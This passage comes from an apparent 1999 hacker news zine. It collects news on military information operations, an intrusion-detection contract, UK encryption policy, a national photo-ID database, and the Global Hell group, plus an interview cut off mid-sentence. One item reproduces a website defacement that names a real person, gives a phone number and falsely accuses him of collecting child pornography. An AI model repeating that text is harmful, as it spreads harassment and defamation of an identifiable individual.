authority that permits their programs to sometimes bypass standard oversight and administrative requirements. The appeal notes that in June the Air Force provided Congress with a "special access required" information paper, which the service says described "in detail" the projects it intends to pursue with the FY-00 funding. The Air Force, citing the classified status of the program, declined to provide additional details on Panther Den.

Copyright Inside the Air Force

Inside the Air Force, September 3, 1999
With kinetic solutions often 'untenable'. . .
PENTAGON EYES INFO OPERATIONS IN BID TO DEFEAT DEEPLY BURIED TARGETS
Richard Lardner

Shortly after Operation Desert Storm concluded in 1991, defense officials began spending more time and money developing kinetic solutions for defeating what are known in military parlance as "hard and deeply buried targets" (HDBTs). The results have been promising: In a 1995 test conducted by the Air Force, for example, a specially configured ballistic missile penetrated 30 feet of granite. Yet using missiles and munitions to defeat HDBTs can be messy, particularly if the target is in a highly populated area. In addition, special operations forces, already taxed on other fronts, are unable to deal with the growing number of HDBTs, which often house command and control facilities or chemical and biological weapons plants. "It's a very hard problem, period," says retired Adm. Henry Chiles, former commander-in-chief of U.S. Strategic Command. HDBTs are "very tough to defeat." Given these constraints, military officials are now beginning to examine how the world of information warfare can help produce more sanitary ways to disable targets encased in concrete or carved into mountainsides. According to internal DOD budget documents, the latest Defense Planning Guidance directs the services, defense agencies and warfighting commands to develop concepts and doctrine to defeat "hard and deeply buried targets using the full range of capabilities, including . . . information operations." The U.S. intelligence community typically assesses hard targets based on physical or structural characteristics. The idea underpinning the IO concept is to look at these facilities more from a functional standpoint; specifically, determining what activities are performed at the facility as well as how that facility relies on information, information systems and information processes.
"Planning and executing an IO-based capability requires detailed intelligence on, as well as access to, not only the target facility but the targeted system or technology -- more detail than is currently obtained to support physical or structural characterization," the documents state. But the budget documents, obtained by sister publication Inside the Pentagon, indicate the department is largely unprepared from an IO perspective to handle the DPG's instructions. "DOD currently does not have a clear understanding of how IO can be used to defeat HDBTs, how to plan for use of IO-based approaches for maximum operational effect, and what optimum investment strategy to use in funding IO-based capabilities," the documents state. Accordingly, the department is considering a proposal to spend $120.5 million between fiscal years 2001 and 2005 on a series of activities "to support planning and execution of IO-based approaches to defeating HDBTs." No final decisions on the funding have been made; however, the documents, prepared by Office of the Secretary of Defense staff for DOD's Program Review Group, make clear that meeting the DPG's instructions is an absolute must. "Lack of access, political constraints, and collateral effects make use of kinetic weapons untenable in many cases," the documents read. "In addition, the rapid proliferation of HDBTs exceeds the capabilities of Special Operations Forces options. "Without IO options, there will be no capability to defeat a significant amount of critical, strategic, HDBT threats." The effort described in the documents involve a variety of agencies, including the Defense Intelligence Agency, National Security Agency, National Reconnaissance Office, Defense Threat Reduction Agency and Joint Staff. The proposed effort consists of eight activities, all of which build upon an IO feasibility study begun in January and scheduled for completion in September 2000. 
The ultimate goal is a fully funded program that produces effective IO-based capabilities to counter HDBTs. According to the documents, the first activity refines and further develops "functional HDBT target characterization models initiated in the feasibility study," to include ballistic missile, command, control, communications, and weapons of mass destruction HDBT facilities. "Rather than focus on physical or structural characteristics of HDBT facilities, IO functional target characterization focuses on determining the reliance of HDBT facilities on information by identifying and characterizing the mission of the facility, functions required to perform the mission, supporting systems and processes, and critical information systems and processes," the documents state. The second activity uses one of the models as a template for a proof-of-concept demonstration. "This will provide DOD an indication of the required 'surge' capability within DOD and the intelligence community to turn one of the models from a template into an actual operational mission planning target model," the budget papers read. Activity three extends ongoing modeling and simulation development to provide additional analytic capability and "mature" evaluation tools. The fourth activity, the documents note, is aimed at determining how effective IO-based approaches are against HDBTs. The fifth element "determines and develops required capability to support software and hardware in the loop testing of IO-based capabilities against HDBTs," according to the papers. The sixth and seventh activities lead to an analysis of alternatives and a cost and operational effectiveness analysis, which are to provide an investment strategy for future IO programs. 
The eighth activity "funds application, and where necessary development, of near-term, high-payoff capabilities and systems identified during the AOA/COEA and for the next two years until services and agencies" finance the efforts on their own, the budget documents state. "This will ensure an interim capability exists." Given that DOD has no clear understanding yet of how to harness IO to take out HDBTs, the outcome of the proposed exercise is hard to predict. The concept, however, tracks with general philosophy of IO and, more specifically, information warfare. That is, some targets can be disabled without being physically destroyed. "What we need to better appreciate is the effects of the targeting that we are talking about and how to incorporate zeroes and ones into that," Air Intelligence Agency Commander Brig. Gen. John Baker said at an IO symposium in March. "If all I want to do is shut down a particular corridor for 24 hours so I can send in assets to take out a particular target, then maybe all I need to do is send a string of zeroes and ones to shut that down and confuse it for 24 hours or two hours or 30 minutes. "I may not need to send somebody in there to blow it up," Baker concluded.

Copyright Inside the Air Force

@HWA

15.0 $19.6 Million Awarded to Create DOD IDS
     ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com

contributed by mortel

The Defensive Information Warfare Technology Applications (DIWTA) contract, a four year $19.6 million agreement, has been awarded to Litton/PRC Inc. by the Air Force Research Laboratory Information Directorate, in Rome, N.Y. This contract requires the development of an automated intrusion-detection system, which will be added to a larger DOD system to detect and gather data on computer intrusions.
Federal Computer Week
http://www.fcw.com/pubs/fcw/1999/0906/fcw-newsalarm-09-06-99.html

SEPTEMBER 6, 1999

Sounding the alarm
Air Force lab's intrusion-detection system is part of an overall system to warn DOD about cyberattacks

BY DIANE FRANK (diane_frank@fcw.com)

The Air Force Research Laboratory Information Directorate, Rome, N.Y., last month tapped Litton/PRC Inc. to build a system that will collect information on cyberattacks or other unauthorized users throughout the Air Force as part of a Defense Departmentwide effort to stem the increasing number of intrusions into DOD computer systems. The development of an automated intrusion-detection system, which will become a part of a larger DOD system to detect and gather data on computer intrusions, is the first task order under the Defensive Information Warfare Technology Applications (DIWTA) contract, awarded to a team headed by Litton/PRC last month. Under the four-year, $19.6 million contract, the systems integrator also will offer other information security solutions, including vulnerability and risk assessment, automated warning and response, and forensics. The contract also will be part of DOD's response to a directive issued by President Clinton last year, known as Presidential Decision Directive 63, which called on federal agencies to develop plans and systems to protect mission-critical computer systems. The Automated Intrusion Detection Environment (AIDE), the first project, will collect information from individual intrusion-detection systems throughout the Air Force to deposit into a central system. The data will be pulled together at local, regional and global levels to generate easily understood reports for administrators on different issues such as similar attacks at several sites. The AIDE is a joint effort between the research lab's Information Directorate and the Defense Information Systems Agency.
The Rome site also is working with the commanders in chief at DOD commands worldwide to collect intrusion information. The data will flow into the Joint Task Force for Computer Network Defense, and the JTF-CND then will correlate the information on a global scale. "We are working across DOD...[and] in the end, feeding all of the information to DISA's Global Network Operations Security Center and the JTF-CND," said Brian Spink, the AIDE program manager and an electronics engineer at the Rome Research Site's Defensive Information Warfare Branch. The JTF-CND serves as the coordination center for DOD agencies and services to report computer security breaches and for responding to cyberattacks. But without the intrusion information from the Air Force and the other services, the JTF-CND is next to useless, said Kent Schneider, vice president and general manager of command, control, communications and intelligence systems at PRC. DIWTA and similar contracts will play a role in overall defense strategy, he said. "This contract is certainly not targeted only at Air Force requirements," Schneider said. "It will certainly be used to enhance their effort in the joint environment." PRC, in addition to facilitating the automation and creation of the central system, is developing a form of "adaptive" intrusion detection, an application that allows the system to learn from past intrusion signatures to recognize future intrusions even if the attacker is using no known method, Schneider said. "It's basically devising techniques and tools that allow you to take existing systems and systems in development and allow them to be monitored as a whole," Schneider said. "The idea of developing adaptive tools that can adjust to a variety of threats is recognizing that the problem is really an issue of defense in depth, with threats from outside and inside the organization." 
The work will focus on the Non-Classified Internet Protocol Router Network, which DOD uses to send unclassified messages, and DOD connections to the Internet, Spink said. NIPRNET and many DOD Web sites have come under such heavy fire from hackers and other unauthorized users that the department has contemplated cutting off all connections to the Internet. Work on the AIDE has been under way for more than a year. The Rome site had used other contracts for the work but decided to create the DIWTA contract last year to provide a more focused group of vendors and resources, Spink said. Through DIWTA, the Air Force has access to 30 vendors, including Booz-Allen & Hamilton Inc., Computer Sciences Corp., Litton/TASC Inc. and Trident Data Systems Inc., and future tasks under consideration will include technology from many of them, Spink said.

@HWA

16.0 UK Plans Super Group to Crack Crypto
     ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com

contributed by Weld Pond

With a budget of £15-20 million, the UK will establish a group of specialist code-crackers. The unit is being set up to counter the growing use of encrypted e-mail by criminals.

News Unlimited
http://www.newsunlimited.co.uk/observer/uk_news/story/0,3879,79397,00.html

E-squad launched to crack criminal codes on the net
Government starts £20 million anti-encryption force amid claims that US has Windows super key

Links, reports and background: more about privacy on the net

Richard Reeves, Society Editor
Sunday September 5, 1999

A specialist code-cracking unit is being set up to counter the growing use of encrypted e-mail messages by drug-runners and paedophile rings. The unit, with funding of £15-20 million will draw staff from the Government's communications centres at GCHQ - but will also headhunt top code designers from the private sector. 'You could compare it to cracking the Enigma code during World War Two,' said one senior Government source. 'We need an Alan Turing for the Internet age.'
Big salaries will be offered to lure high-flying programmers into the unit, which will be given a deliberately anodyne name - almost certainly the Government Telecommunications Advisory Centre. 'The major criminal organisations, especially the drugs cartels, are incredibly sophisticated. They have the money to have whole departments working on codes. For now the encryption problem is not huge - but it is going to grow and we need to be ready for it,' said the source. Combined with fingerprint access, encrypted e-mail messages are likely to become the communication of choice for serious criminals, according to the intelligence services. Legitimate businesses are also poised to use encryption to protect market-sensitive information, with two-thirds of firms saying that security fears were the biggest barrier to joining the e-commerce revolution, according to a Department of Trade and Industry survey. Since the Government abandoned plans to force all users of encryption to deposit a key with a 'trusted third party' - a move fiercely opposed by business - attention has focused on beefing up the detection of electronic data by law enforcement agencies. 'We are ending up with one of the most liberal regimes in the world,' said a DTI official. 'This makes interception of messages and rapid decoding vital.' Experts at the National Criminal Intelligence Service (NCIS), which will also provide staff and support for the unit, said that gathering real-time information was crucial to the police and customs. 'Given enough time and computer power, most codes can be cracked,' an NCIS expert said. 'But cracking a code two weeks after a message has been intercepted is more often than not completely useless, given that details of deals, time and place, are what we need. Real-time information is gold-dust.' The intelligence and law enforcement services hope the team of code-crackers will help electronic eavesdropping as fruitful as phone-tapping has been in recent decades.
During 1996 and 1997, interception of communications - almost entirely phone taps - resulted in 1,200 arrests, seizure of 115 tonnes of illegal drugs and 450 firearms, according the Home Office. More than half of the 2,600 interception warrants issued by the Home Secretary resulted in arrests. Some of these are already the result of e-mail interception, but the Home Office does not advertise the success of 'e-taps'. Later this year the DTI is introducing a Bill on electronic commerce, which will put in place a voluntary system of accreditation for firms using the Internet to conduct business. The Bill will also give law enforcement agencies the right to demand the computer key to an encryption 'key', having been granted a warrant as part of a criminal investigation. But intelligence officers said this power was of limited value because demanding an encryption key tells criminals they are under investigation. The Government will be at pains to allay fears of a Big Brother state intercepting personal e-mail. 'The idea that we have any interest in the communications of anyone other than serious criminals, or indeed the resources, is laughable,' said the NCIS source. @HWA 17.0 Nationwide Identity Database Plans Started in 1997 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com contributed by mortel Earlier this year it had been reported that Image Data LLC in New Hampshire had been buying up driver license photo's and other information from around the country to create a nationwide identity database. The Electronic Privacy Information Center has discovered from over 300 documents obtained via the Freedom of Information Act that the original idea for this plan came about back in 1997 when it was first presented to the US Secret Service. Wired http://www.wired.com/news/news/politics/story/21607.html Electronic Privacy Information Center http://www.epic.org/ Smile for the US Secret Service by Declan McCullagh 3:00 a.m. 
7.Sep.99.PDT WASHINGTON -- A New Hampshire company began planning in 1997 to create a national identity database for the federal government, newly disclosed documents show. Image Data's US$1.5 million contract with the US Secret Service to begin digitizing existing driver's license and other personal data was widely reported early this year. But documents unearthed by the Electronic Privacy Information Center reveal the details and scope of the project. An Image Data presentation to the government -- marked confidential -- stressed that pilot projects in three states would "ensure the viability of deploying such service throughout the United States," according to about 300 pages of files EPIC obtained under the Freedom of Information Act. In a February 1999 report, Image Data CEO Robert Houvener ridiculed the idea that there were any legitimate privacy issues at stake, including those raised by civil libertarians when the project was first disclosed. "Many other newspapers, television programs, magazines also did news stories on Image Data LLC and its system [that] in some cases ... focused on the 'Privacy' concerns and presented an inaccurate presentation," Houvener wrote. But privacy groups aren't wavering. "We think that their proposal for a national database of photographs runs directly contrary to the types of privacy safeguards that should be developed," says EPIC director Marc Rotenberg, who met with Houvener last week. "This is not a database that people can easily opt out of. You have to give up your photograph when you get a driver's license." Houvener, who says he has been a "victim of identity fraud," says his national photo file will be targeted at "identity criminals" that he estimates cost businesses billions of dollars a year. US legislators who funded the project believed the database would be used to stop illegal immigrants and terrorists. 
"The TrueID technology has widespread potential to reduce crime in the credit and checking fields, in airports to reduce the chances of terrorism, and in immigration and naturalization to verify proper identity," said a September 1997 letter from eight members of Congress to Image Data. Image Data's "True ID" technology currently feeds photos into its database in one of two ways. The company has contracts with state motor vehicle departments that supply the analog negatives or the digital images on magnetic tape. It also persuades shoppers to scan their IDs into the database by inserting them into devices at specially equipped stores. After news reports appeared focusing on the project, the governors of Colorado and Florida halted the transfer of images to Image Data, and South Carolina filed suit asking for the return of millions of images already in the company's possession. How did Image Data feel about South Carolina's actions? "The PR, legal, and legislative situation in the pilot State will continue to be evaluated and dealt with," a January 1999 company report says. Image Data has publicly downplayed the Secret Service's involvement, but the documents show that the agency decided which states would be part of the initial pilot project and directed the timing of the effort. According to one of Image Data's monthly reports sent to Special Agent Cary Rosoff of the Secret Service's financial crimes division, company representatives were negotiating a contract with Missouri officials, too. "Missouri [is] in the final stages of implementing a digital driver license system. Most issues are resolved, and we expect closure within 4-6 weeks," the document says. The Secret Service deleted some information from the documents before releasing them, and only a few pages prepared by the government are included. But it seems that discussions of the project began in early 1997. 
The government signed an agreement with Image Data in late 1997 and the contract took effect on 15 December of that year. Soon after, the company began to work closely with Telecheck, a subsidiary of First Data Corporation. By mid-June 1998, the computer interface between Image Data and Telecheck was complete and images could readily be exchanged. One frequent problem: Scanning millions of existing 35 mm photos into the database. "The digitizing machine is behind schedule.... There has also been some slippage due to the custom machining of the components for the scanner itself," the documents reported about Colorado DMV photos. Another headache for Image Data executives was Florida's policy of allowing drivers to renew their licenses twice by mail. That means people are less likely to come in and be photographed by digital cameras, which can automatically forward the photo to Image Data. "For a state like Florida, [up] to 45 million negatives would have to be digitized to get an online image of all current licenses," a November 1998 report says. The documents show how Image Data planned to sell the idea not just to the federal government, but also to state officials. "This program will demonstrate a highly effective way of ... increasing tax revenue. The positive impact of this demonstration cannot be ignored. Once government agencies and businesses see the effectiveness of this technology and implement it for their own programs, the positive impact to state and federal budgets will be in the billions of dollars per year," says one Image Data proposal that is marked "proprietary."

@HWA

18.0 Game Boy Advance to Connect to the Internet
     ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com

contributed by frost_frozen

While over a year away from release (nothing like a little advance hype) the next version of Nintendo's Game Boy will have Internet connection capability.
The Game Boy Advance will be able to use a cell phone and modem to connect to Internet to play network games, exchange pictures, chat, and even read and send email. (And I wonder what other interesting things that it can be made to do. hehehe) Wired http://www.wired.com/news/news/technology/story/21590.html Game Boy Gets the Net Picture by Andy Patrizio 3:00 a.m. 4.Sep.99.PDT When you see a kid furiously punching away at a Game Boy, you should ask not just what he's playing, but with whom, and if you can see what they look like. Nintendo announced that its next-generation handheld game device will connect with cell phones and digital cameras. The phone connection will allow players to download games from the Internet, play against others online either one-on-one or in multi-player games, take part in real-time chat, and even send and receive email. Code-named the Game Boy Advance, it will use a 32-bit RISC chip developed by ARM Holdings, of Cambridge, England. ARM's chips are most often used in cellular phones. In addition to the cell phone connection, the Game Boy Advance can connect to a digital camera that is more advanced than the one currently available for Game Boy Color. Using both the Internet connection and digital camera, players will be able to see each other while playing, according to a Nintendo spokesman. These add up to lots of ways to rack up phone charges when mom and dad aren't looking. The Game Boy Advance won't be on the street anytime soon, however. Nintendo said it will hit the Japanese market in August 2000, and be available in the US and Europe in time for Christmas 2000. Pricing has not been determined. The Game Boy Advance will be fully back-compatible with the original and color Game Boys currently on the market. It can also be hooked up to Nintendo's forthcoming Dolphin console. Players will be able to transfer games or characters from the Dolphin to the Game Boy Advance or vice versa. 
Along with the new handheld unit, Nintendo announced a joint venture with Japanese game vendor Konami. The new company, Mobile 21, will develop software that will optimize interaction between the Game Boy and Dolphin platforms.

@HWA

19.0 South African Security Industry goes Loco over Portscan
     ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Contributed by Wyzewun

Recently, I recommended on the IOZ.Security mailing list that an audit of as much of the South African internet as possible should be done, and some conclusive statistics as to the non-existent state of computer security in our country should be made public, without disclosing hostnames etc, just percentages. All posts in response to it recommended that I go through with the idea and not one complaint was received. Everything looked good. I did a preliminary portscan on one of the hosts I was going to audit, but didn't go into actually checking for potential security holes. I thought nothing of it, until suddenly everyone I knew was talking to me about things like "causing quite a stir, eh?" to which I aptly responded "Huh?" Turns out it was a box run by the chief security dude from ISPA (The ISP Association of SA) and he was bitching and whining about the scan publicly on the mailing list, pretending to simply "not notice" any of my posts telling people it was going to happen. Soon enough things like "He compromised the server which he portscanned from" were being said which is total bullshit since it was an ISP that I do... well, now *used* to do security consultancy for. I don't know exactly what was said exactly, and honestly, I don't want to know. It's just too pathetic. The fear 90% of the sys admins were struck with was astounding, and manifested itself in all sorts of ridiculous things, even plans to sue me as soon as I tried to portscan them.
(Yes, I know for a fact was planning to do this to me - how sad) But even still, no-one just stood up and said "Hey, please don't portscan me when you do the audit - thanks." Their incompetency made them petrified of the very idea of being showed up by some-one without as many fancy certificates as them, and the "Get scanned and look like an idiot" and "Don't get scanned and look like an idiot" options were a kind of a Catch 22 situation for them.

But think about it, what is a portscan? It's a widely accepted standard for checking what ports are open. Netcat is a standard util with most Linux distros these days, and has portscanner functionality. Nmap is a tool commonly used by admins everywhere. And besides, it is *completely* unlike actually probing for vulnerabilities, or attempting to overflow their FTP daemon. And ultimately, if you don't *want* people to portscan you - don't make it possible - get Portsentry or something. Yet, they freaked out notably, my accounts on the ISP got suspended without explanation, along with the possibility of me being able to put them down as a reference on my CV and I am now pretty much homeless on the internet. (Well, I'll be getting my FreeBSD server online soon, so all is not lost, but this just gives you an idea of the fucked up kind of people who call themselves "security consultants" in our country. ;-)

Epilogue: After my post to the IOZ.Security mailing list telling them they were being complete idiots, and subsequent unsubscription, it appears the majority of the occupants had a sudden change of heart. In fact, a good friend of mine got flamed until he roasted for saying "Maybe you should just spend less time scanning and more time studying for your upcoming finals" - guess there are two faces to every beast. ;)

@HWA

20.0 Owner of ZANet IRC Network runs into trouble
     ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Contributed by Wyzewun of FK

Pieter Immelman, aka.
Gaspode , the owner of ZANet, the largest South African IRC network, seems to have finally gotten a bit of his karma back. For years now he has had a reputation for k-lining everything in sight for any reason his sick twisted mind can fathom, and has never had any intention on stopping acting like that. However, recently, it seems that he has annoyed a few of the wrong people and as a result, many South African websites have suddenly become "Hacked by Gaspode" pages. There were a great variety of these, I only archived one, but it will give you a pretty good idea of what they were like... Hacked by Gaspode y0 y0 y0 This is Gaspode, the pheered IRCop from ZANet rapping to y'all over my Hax0red airwaves - Aight. Listen up, coz I got a message for duh werld! Pheer Gaspode! He is the IRCop that k-lines everything in site! Pheer Gaspode! He can Hax0r anything on this planet! Pheer Gaspode! He runs an IRC network like a facist state and enjoys it! Jez, joo are all 0wned by Gaspode, and there is nothing you can do about it! I can hax0r crax0r any bawx on the i-net, and in the unlikely event that I can't, I will have gay anal sex with your Sys Admin until he bleeds! Phone me and tell me how much you pheer me on (021) 530-1200, my name is Pieter Immelman. Joo can't pr0ve anything - I do not pheer joo. If I'm not in, feel free to talk to my boss, I'm sure he'll be perfectly happy to phonesex joo! Ha Ha - Just joking Boss Man, I know you only have phone sex0r with me ;-) Heck, If you don't feel like talking to me about me hax0ring your site, you can try and get me to take your niq of hold. Hmm - I don't even know what your niq is - but I'm sure I have it on hold. I have everyone's niq on hold. Would you like to take your nick off hold? Please visit my favourite sites, www.gayporn.com and www.gaspode.org/~pi - I don't have the kiddie porn up on the second site yet - sorry about the delay, but my boyfriend hasn't finished with it yet. 
If you would like to contribute to my small collection of kiddie and animal porn (Only a measely 25GB so far) you can mail it to me at pi@gaspode.org - I would love to get anything you have - especially cum shots. Gawd, I L0VE cumshots! They makez0r me itch all over and get all fagular. Greetz tew all my bumchums in #gaysa and all my leet friends in #hack - J00 GuYZ 0WN M4N!!! All my Love, Gayspud The rest followed pretty much the same pattern, except the rest made references to Aztec, the company he works for - which I assume caused a bit of friction between him and his boss. An unamed ZA hacker stated on SABC Special Assignment that these hacks would continue until Gaspode delinked from ZANet. The SABC also tried to contact Gaspode, but he refused to comment on the matter. @H @HWA 21.0 Global Hell Expose ~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com contributed by altomo A long hard look at Global Hell and some of its members including MostHated, ben-z, altomo, egodeath, nostalg1c, Mnemonic and others. Global Hell or gH has been linked to well over 100 web page defacements and one of its members, Mindphasr (Chad Davis), has been arrested by the FBI. MSNBC http://www.msnbc.com/news/308025.asp Is Global Hell going legit? An exclusive look inside one of the digital underground’s most infamous groups By Brock N. Meeks MSNBC WASHINGTON, Sept. 6 Global Hell is dead; long live Global Hell This infamous digital underground clan, whose members have been the target of raids by the Federal Bureau of Investigation, claims to be in the midst of a dramatic about-face. We’ve gone legit, says gH co-founder Mosthated. WHERE ONCE GH WAS the scourge of sloppily administered Web sites everywhere, the group now claims it has sworn off such illegal activity. 
“We are not a hacker group,” Mosthated says, in an effort to distance the group from its negative press painting the group as a malicious “hacker gang.” gH rose to more than a minor annoyance when it was linked to the defacement of the official White House Web site earlier this year. A short time later several members of the group around the nation were raided by the FBI. No arrests were made, though computer equipment was confiscated. In the aftermath of the raid, a cyberspace border war broke out. The electronic underground erupted with a spate of Web site defacements, all vouching support for gH while spewing profanity-laden tirades at the FBI. In perhaps the ultimate insult to the FBI, its own Web site was put out of commission through a denial-of-service attack, which moved the bureau to shut down all public access to the site until the attack could be thwarted.

[Photo caption: Three members of the infamous 'Global Hell' hacker group that has been the target of repeated FBI raids. From left to right, ben-z, altomo, and egodeath]

On Aug. 30, the hammer dropped: A joint FBI and Army Criminal Investigation Command investigation resulted in the arrest of Chad Davis, a 19-year-old Wisconsin man also known as “Mindphasr,” a co-founder of gH, for breaking into a U.S. Army computer. Davis also had been raided earlier in the year in the first crackdown on gH.

SCARED STRAIGHT

An indication that the sea change among gH members has actually taken hold is what happened in the aftermath of Davis’ arrest: nothing. An urgent bulletin was released by iDefense, a consulting group that monitors electronic threats, after Davis’ arrest warning Web administrators to be on high alert for retaliation. It never came. Inside an IRC chat room where gH members congregate electronically, the word went out: No retaliation. It held, despite the fact that there are no hard and fast “ground rules” that bind the group.
“There is no hard control,” says “nostalg1c,” a gH member, “we just know what we should and shouldn’t do.” gH is a loose coalition of 15 to 20 members spanning ages from 13 to 29, its members drawn from the United States, Canada, Belgium and Southeast Asia. A band of brothers — and one female — who find solace in their digital bonding wrapped around the camaraderie that comes from the sharing of knowledge about the most intricate workings of computers and computer networks. Though the continued pursuit of gH by the authorities has resulted in but one arrest, the fallout has inflicted a kind of “scared straight” mentality on the group. “We have grown up and realized that hacking gets you nowhere but locked up,” says Mosthated, “unless you become a type of white hat hacker to hack for networks and businesses or being a consultant, which multiple people in gH have done.” Eighteen-year-old gH member “f0bic” put a fine edge on the FBI threat: “It made me realize that hacking isn’t really worth going to jail for.” When another gH member pleaded guilty to conspiracy charges related to breaking into government and military sites that were really done by Belgium-based member “nostalg1c” — when both were members of yet another hacker group — the light bulb came on: “At that point I realized it ain’t no game we’re playing,” nostalg1c said, “It is dangerous.”

NO STEREOTYPES

Members of gH are an eclectic blend whose lives, to date, could fill a couple of volumes of biographies. Several come from broken homes, others are living with both parents. Some have siblings; others are only children.
“Ben-z” a 16-year-old who was raided by the FBI, goes to a private school now because “I was a trouble maker in public school,” and identifies himself , tongue-in-cheek, as a “jock, pothead, lush, asshole, geek, wigger.” His big inspiration: “I was a big fan of the movie ‘Tron’ when I was a kid,” he says. They all love the ladies. Several members have rap sheets; One has served time in prison for computer-related crimes dating back to the 1980s. All got into computers in their early teens, save for the group’s youngest member, “Jaynus,” who began to explore the inner workings of a Windows 3.1 machine at the age of 9. By and large, their parents are unaware of any nefarious computer activity, except for those whose homes have been visited by the FBI. “I don’t think that any parent is stupid enough to know that a kid that sits in his room endless hours and endless nights is just ‘chatting to his friends,’” says “obsolete.” “I think that any parent with half a brain actually knows that he is doing something semi-illegal.” And there is no shortage of “comeback” stories to be found here. If the maxim “lead from above” carries any truth, one of the most inspiring stories is found in gH’s own founder, Mosthated. Long before he was raided earlier this year by the FBI, the 19-year-old says he “went legit” and started working as a security consultant and setting up computer networks. Vallah, a former Microsoft programmer who was questioned by authorities for alleged connections to gH, encouraged Mosthated to pursue more legitimate programming ventures. “Vallah would tell me I had a future away from doing this kind of [illegal] stuff and taught me a lot of ways to just do what I love to do, but legitimately,” Mosthated says. 
“Don’t’ judge a whole group because of an individual’s mistake.” — MOSTHATED Computers also were a way to escape the mean streets of Mosthated’s neighborhood, he says, a place where “you with get locked up or die before you reach your 20’s.” Mosthated admits he’s been in trouble with the law “multiple times” but that he sees computers as his way out. He also credits his girlfriend with encouraging him to stay into computers, rather than stray back to the streets. There are no thoughts of disbanding gH, Mosthated says, despite the spate of negative publicity surrounding the group on the back of co-founder Davis’ arrest. “Don’t’ judge a whole group because of an individual’s mistake,” Mosthated says. ”[Davis] knows he messed up, and the only thing we can do is hope the best for him.” And then consider the 17-year-old “egodeath,” who is struggling with his new-found sobriety. Out of rehab for drug abuse, he’s diving into his computer as way to try and make reality without drugs more palatable. Staying clean is “the hardest thing I’ve ever done,” he says, noting that he didn’t realize how much he missed his computer until he was locked up over the summer and couldn’t get access to one. Now he holds a job at a video rental store and finds solace in the friends he’s made in gH. CHARITABLE ACTS The typical braggadocio relating computer break-in exploits was conspicuous by its absence when gH members talked to MSNBC. Instead, a surprising number of “random acts of kindness” were related. Several of the gH members now say they content themselves with “scanning” for security holes and informing the computer system’s administrator of the vulnerability. Such notices are essentially a “wake up call” that the computer system is a sitting duck. “Scanning is just like looking in the windows of a house,” Ben-z says. “That’s not illegal. 
But once you break the window and climb in, you’re in trouble.” Many of the gH members reported that when they informed a system administrator of a security hole, they were either cussed at or simply ignored. Others reported getting back messages of thanks for pointing out the flaws. Mosthated says that when a former member of gH attacked the FBI’s Web site, he called and offered assistance but was ignored. CAN’T KEEP A GOOD HACK DOWN As a group, gH may have sworn off breaking into computer systems, but several members acknowledged they still continue to “dabble” in the efforts for the continued thrill of it, but on their own and outside of activities that could be linked to gH as a group. Mnemonic, a 26-year-old gH member unabashedly admits that he’s “still very much into” penetrating computer systems. “It just annoys me when I see them deface websites,” he says. “If you noticed, most people who get caught defaced websites.” Mnemonic also can’t brook with what he calls the “we’re doing you a favor, kids,” referring to the line that some computer vandals use to justify their exploits. “You get into it, you know you’re doing something illegal,” he says, “That’s the fun about it. If it weren’t illegal, a lot of people wouldn’t do it.” Despite his own leanings, Mnemonic tells the younger members of gH: “If you’re going to do it, plan on getting caught.” @HWA 22.0 "NSA" key in Microsoft CryptoAPI ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com contributed by prozac Bruce Schneier, noted cryptography expert, has some interesting down to earth comments on the "NSA" key in the Microsoft CryptoAPI. Counterpane Systems http://www.counterpane.com/ OSALL has posted the first of several installments of an interview with Andrew Fernandes who was the first person to bring the "NSA" key to the publics attention. 
OSALL - Interview with Andrew Fernandes http://www.aviary-mag.com/News/Cryptonym_Interview/cryptonym_interview.html Cryptonym Interview 9/9/99 Mike Hudack Editor-in-Chief It was about a week ago that Andrew D. Fernandes of Cryptonym came out with the revelation that there´s a public key named "_NSAKey" in the Crypto API which is bundled with all versions of Windows since 95. The media jumped on it quickly -- demanding comment from Microsoft and the like. The entire issue ended blowing up and some people ended up with a little egg on their faces -- including OSAll. In order to kind of wrap things up, OSAll ended up speaking with Andrew Fernandes at length -- for more than an hour. Following is the first installment of our discussion, written verbatim from the recording. The Interview: I´m afraid I didn´t have too much time to put everything together here... You know, school and everything. So just bear with me. That´s alright. I was reading your Web site just a little bit ago. Not bad. I like what I´ve been seeing, too. But anyway... You know, for legal reasons, I have to go through the whole thing... You´re being recorded now, everything is on the record, da da da... Everything we say will (hopefully) be printed verbatim, assuming the recording works right. If I have to do it by memory I´ll have to e-mail you to verify everything, of course. Oh, absolutely. One of my journalist friends who I kind of hold up as a hero... Says that everything should always be on record. I kind of live by it. Absolutely... It´s so true. I´ve had problems with things -- whether they´re on record, or off... It´s just a pain in the ass. All right... The first thing I want to ask you -- how long did you spend reverse engineering things before you came up with everything? Oh, well that. That´s actually a common misconception. I don´t know how it got started, probably because of some non-technical reporter. So you weren´t reverse engineering it? You decompiled it, right? No, not even that. 
The real story is considerably less glamarous. I wish I could point to some great genius on my part... That would be an absolute lie. Yeah, wouldn´t we all... What actually happened was I was doing some development work using Crypto API -- CAPPY -- and something wasn´t working. You know, it had nothing to do with cappy. I just happened to be using cappy because I wanted to see what it looked like. Something in my module wasn´t working and I was irritated. I don´t know if you´re a programmer... Yeah, somewhat. Yeah. Well I don´t know what you do when things aren´t working, but I just stare into never-never land. If I relax my brain, empty it out, maybe something will come to me. So, I was at one of those points and I was basically single-stepping my way through looking for the error. Something wasn´t working and I was thinking maybe the compiler was generating incorrect code, or... I wasn´t even looking at the program to be brutally honest, I was just staring at ta golf course... Clicking next, next, next. I don´t know how many times I was clicking the mouse. As I looked back at the screen I made a couple of simultaneous discoveries. One was that Windows NT, unlike Windows 95, allows you to one-step right into system DLLs. Okay, I never knew you could ever do that. The next thing was I was buried smack inside one of the DLLs... What was it? One of the Crypto API DLLs? Yeah, it was the [unintelligible] DLL... And you know, these words are popping out at me. There was RC4, and the one that really popped out to me was "key." You know, anything you can make sense of in assembly just 